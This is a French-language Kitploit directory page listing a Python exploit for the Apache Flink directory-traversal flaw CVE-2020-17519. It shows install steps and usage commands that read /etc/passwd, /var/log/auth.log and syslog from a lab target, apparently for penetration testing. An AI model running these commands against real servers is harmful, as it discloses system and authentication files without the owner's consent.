Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-17519 — Exploit de traversée de répertoire basé sur Python pour CVE-2020-17519 (Apache Flink) avec multithreading, support de proxy et profondeur configurable pour récupérer les fichiers journaux depuis des cibles vulnérables. | Kitploit
Outils/GitHubGitHub/gazettel/cve-2020-17519
ReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubgazettel/cve-2020-17519

CVE-2020-17519

Exploit de traversée de répertoire basé sur Python pour CVE-2020-17519 (Apache Flink) avec multithreading, support de proxy et profondeur configurable pour récupérer les fichiers journaux depuis des cibles vulnérables.

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2020-17519

Outil de traversée de journaux

Un outil Python qui utilise une technique de traversée de répertoire pour récupérer des fichiers journaux depuis une URL cible. Il affiche une progression en temps réel, prend en charge la configuration d'un proxy et sauvegarde optionnellement les réponses valides.


Fonctionnalités

  • Traversée de répertoire avec profondeur configurable
    Utilise une profondeur configurable pour la traversée de répertoire.
  • Chemin de fichier unique ou multiple
    Prend en charge la demande d'un seul chemin de fichier ou de plusieurs chemins depuis un fichier.
  • Support du multi-threading
    Exécute les requêtes simultanément en utilisant plusieurs threads.
  • Support du proxy
    Permet de configurer un proxy pour les requêtes.
  • Sauvegarde des réponses valides
    Sauvegarde les réponses valides dans des fichiers individuels.
  • Affichage de la progression en temps réel
    Affiche la progression en temps réel à l'aide de pwntools.

Prérequis

  • Python 3.6 ou supérieur
  • Paquets Python : requests et pwntools (pwn)
  • Bibliothèques standard : argparse, os, concurrent.futures, threading

Installation

  1. Clonez le dépôt
    root@kitploit:~
    git clone https://github.com/GazettEl/CVE-2020-17519.git
    pip install requests pwntools
    

Utilisation

L'outil peut être exécuté depuis la ligne de commande avec diverses options. Voici quelques exemples :

Exemple 1 : Demander un seul chemin de fichier

root@kitploit:~
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 12 --file-path /var/log/syslog --threads 1 --save

Exemple 2 : Demander plusieurs chemins de fichier depuis une liste

root@kitploit:~
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 12 --file-list file_paths.txt --threads 4 --proxy none

Exemple 3 : Exécution avec proxy désactivé

root@kitploit:~
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 10 --file-path /var/log/auth.log --threads 2 --proxy none

Exemple 4 : Utiliser une liste de fichiers et sauvegarder les réponses valides

root@kitploit:~
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 15 --file-list paths.txt --threads 4 --save

Exemple 5 : Demander un seul fichier avec une profondeur augmentée

root@kitploit:~
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 20 --file-path /etc/passwd --threads 1

Pour plus de détails, consultez le code source et les commentaires en ligne.

Télécharger l’outil